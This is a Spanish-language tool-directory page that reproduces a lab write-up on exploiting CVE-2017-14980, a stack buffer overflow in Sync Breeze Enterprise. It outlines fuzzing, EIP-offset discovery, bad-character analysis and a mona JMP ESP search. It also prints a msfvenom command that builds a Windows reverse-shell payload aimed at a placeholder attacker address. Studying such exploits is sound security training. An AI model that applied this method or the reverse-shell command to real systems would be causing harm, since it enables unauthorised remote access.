Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2017-14980 — Estudio de una vulnerabilidad clásica de desbordamiento de búfer basado en pila en un entorno de laboratorio controlado con fines educativos. | Kitploit
Herramientas/GitHubGitHub/godoy-sec/cve-2017-14980
ExplotaciónDepuradoresFuzzingAprendizaje y EducaciónGeneración de ShellcodeDesarrollo de PayloadsExplotación de BinariosLabs y Práctica
GitHubgodoy-sec/cve-2017-14980

CVE-2017-14980

Estudio de una vulnerabilidad clásica de desbordamiento de búfer basado en pila en un entorno de laboratorio controlado con fines educativos.

Ver Repositorio
1hace 11 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2017-14980

Sync Breeze Enterprise 10.0.28 - Investigación de Desbordamiento de Búfer

Objetivo

Estudio de una vulnerabilidad clásica de desbordamiento de búfer basado en pila en un entorno de laboratorio controlado con fines educativos.

El objetivo de este proyecto era comprender mejor:

  • Fuzzing de aplicaciones
  • Análisis de fallos
  • Control del EIP
  • Identificación de caracteres malos
  • Corrupción de memoria
  • Flujo de ejecución de shellcode
  • Metodología básica de desarrollo de exploits

Entorno

  • Máquina Virtual Windows 10
  • Sync Breeze Enterprise 10.0.28
  • Immunity Debugger
  • Mona.py
  • Python

Configuración del Laboratorio

El primer paso consistió en instalar Sync Breeze Enterprise 10.0.28 dentro de una máquina virtual Windows 10 configurada para la investigación de vulnerabilidades y el desarrollo de exploits.

El entorno fue aislado para garantizar pruebas seguras y controladas.

Ambas máquinas virtuales (objetivo y atacante) se configuraron usando el modo Adaptador de Red en Puente (Bridged Network Adapter) para permitir la comunicación directa entre los sistemas durante el proceso de explotación.

Cliente Sync Breeze

Sync Breeze Client

Página de Inicio de Sesión de Sync Breeze

Sync Breeze Login


Metodología

1. Recopilación de Información

Se configuraron herramientas de depuración para analizar el comportamiento de la aplicación durante la ejecución y observar las condiciones del fallo.


2. Fuzzing

Se enviaron grandes secuencias de bytes a la aplicación con el fin de identificar el tamaño aproximado de búfer necesario para provocar un fallo.


3. Validación de la Vulnerabilidad

Tras identificar el umbral de fallo, la aplicación se probó nuevamente usando el tamaño de payload descubierto para confirmar la vulnerabilidad.


4. Control del EIP

Se identificó el desplazamiento exacto necesario para sobrescribir el Puntero de Instrucción (EIP).

Generar un patrón único:

root@kitploit:~
/usr/bin/msf-pattern_create -l <SIZE>

Identificar el desplazamiento:

root@kitploit:~
/usr/bin/msf-pattern_offset -l <SIZE> -q <EIP_VALUE>

Donde:

  • <SIZE> = longitud del payload descubierta durante el fuzzing
  • <EIP_VALUE> = valor de 4 bytes observado sobrescribiendo el EIP

Captura de Pantalla del Control del EIP

EIP Control


5. Análisis de Caracteres Malos

Se identificaron los caracteres malos para determinar qué bytes no podían ser procesados de forma segura por la aplicación.

Archivo de Caracteres Malos


6. Identificación de la Dirección de Retorno

Se localizó una instrucción JMP ESP adecuada en un módulo sin ASLR habilitado.

Enumerando los módulos cargados:

root@kitploit:~
!mona modules

Buscando JMP ESP:

root@kitploit:~
!mona find -s "\xff\xe4" -m <MODULE_NAME>

Se dio preferencia a DLLs específicas de la aplicación debido a la presencia de direcciones de memoria estáticas.

Captura de Pantalla de Mona JMP ESP

Mona JMP ESP


7. Prueba de Ejecución

Se validó el flujo de ejecución del payload para garantizar la correcta redirección al búfer controlado.


8. Generación del Shellcode

Se generó el shellcode excluyendo los caracteres malos previamente identificados.

root@kitploit:~
msfvenom -p windows/shell_reverse_tcp LHOST=<LOCAL_IP> LPORT=<PORT> EXITFUNC=thread -b "BAD_CHARS" -f c

Se añadió un sled NOP (\x90) antes del shellcode para mejorar la fiabilidad de la ejecución del payload.

Captura de Pantalla de la Ejecución del Payload

Payload Execution


9. Desarrollo del Exploit Final

El exploit final se ensambló y probó con éxito dentro del entorno de laboratorio aislado.

Aviso Legal

Este proyecto fue desarrollado estrictamente con fines educativos y de investigación dentro de un entorno de laboratorio aislado.

Descargar herramienta